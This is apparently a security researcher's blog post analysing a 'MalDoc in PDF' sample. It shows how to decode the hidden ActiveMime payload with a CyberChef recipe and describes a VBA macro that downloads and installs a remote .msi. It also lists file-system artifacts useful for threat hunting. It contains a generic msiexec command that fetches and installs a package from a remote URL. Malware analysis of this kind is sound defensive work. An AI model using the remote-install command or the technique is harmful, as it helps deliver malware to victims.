[Mal Series #26] Quick Analysis on Maldoc in PDF

4 min readSep 1, 2023

Recently just came across with the JPCert blog which talks about MalDoc in PDF which is quite interesting and I’m just took the sample and start analyze on them. This blog will share my analysis and a interesting artifact that left behind when the maldoc starts an internet connection to next stage url.

It is recommend to read through their blogs for better understanding on the file structure.

Analysis

Thanks for Will Dormann’s X post which mentioned that the link tab with rel attributeEdit-Time-Data will points to a base64 encoded ActiveMime blob. This would be a great start to begin the analysis.

In the malicious sample, it was found that the string in link tab with rel attribute Edit-Time-Data has been URL encoded. The decoded URL string leads to a .jpg file.

By following the .jpg file, there is a large chunk of base64 strings which is bloated with CRLF (0x0d 0x0a) and spaces (0x20). This looks suspicious as other content data are in base64 too but there is no such anomaly pattern in their base64 string data.

In order to filter out the unrelated base64 strings, we can hex dump the content and pass it to CyberChef or your own script to clean up the data.

After cleaning the file, followed by the base64 decode, a notable magic header ActiveMime appears right away which caught my attention.

Did a quick search on ActiveMime strings in Google and it lead me to this blog from xpnsec which provides a way to deal with this kind of file. I will just re-implement his solution in CyberChef this time.

Basically just remove the first 50 bytes of the base64 decoded data (The one with ActiveMime magic header) and zlib decompress it.

A successful decompress will give us a OLE file which can be saved and perform a full string dump it via oledump.py from Didier Stevens

From the vba macro code above, it will launch a windows installer function that call InstallProduct to download and install a .msi installer file from a remote site once the user open the document (Usually there will have a warning before enabling the macro, so it won’t be execute directly 😌).

The InstallProduct VBA function is equivalent to msiexec.exe

msiexec.exe /i https://server/share/package.msi

Interesting Artifact

It was quite interesting that it will generate a CreateFile event on the C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86 folder path from MS Office which contains the full url of the next stage payload. It seems like the folder will be used store the .msi file for installation.

Next Stage URL Found In File Path

Since it is running within a closed network, therefore there is no other events found after that. Therefore, I tried to simulate the behavior frommsiexec.exe with a legit .msi url link to check for its full event.

Running a msiexec.exe on a random .msi file (in this case is orca.msi) shows similar url pattern in the default download path.

Based on the blog in Microsoft:

If the installation database is at a URL, the installer downloads the database to a cache location before starting the installation.
The cache location is in %windir%\installer and it is system protected folder.

When the orca.msi file from the target url started to receive by the machine successfully (When a installation prompt is shown), its initiating process tries to create a copy of the .msi file with some hashed file name (In this case is 77f4f0.msi) into the cache folder. However, there is no actual file created yet in the cache file.

The PID changed after user click on the Install button of the .msi file

The 77f4f0.msi file created after Install button was clicked where the installer starts to drop all its file into the machine.

Besides those behavioral indicator, we can check for any file with .doc extension (not limit to that) that identify as PDF file that create a outbound connection to suspicious url.

These artifact can be a good indicator to hunt for those suspicious .msi url download activities.

References

https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html

https://blog.xpnsec.com/apt32-phishing-malware/

https://twitter.com/wdormann/status/1696197904262742370

https://learn.microsoft.com/en-us/dotnet/api/system.environment.specialfolder?view=net-7.0

CyberChef recipe to decode the suspicious base64 payload

Find_/_Replace({'option':'Regex','string':'(0D 0A |20)'},'',true,false,true,false)
From_Hex('Auto')
From_Base64('A-Za-z0-9+/=',true,false)
Drop_bytes(0,50,false)
Zlib_Inflate(0,0,'Adaptive',false,false)
To_Hexdump(16,false,false,false)

[Mal Series #26] Quick Analysis on Maldoc in PDF

Analysis

Interesting Artifact

References

Written by GhouLSec

No responses yet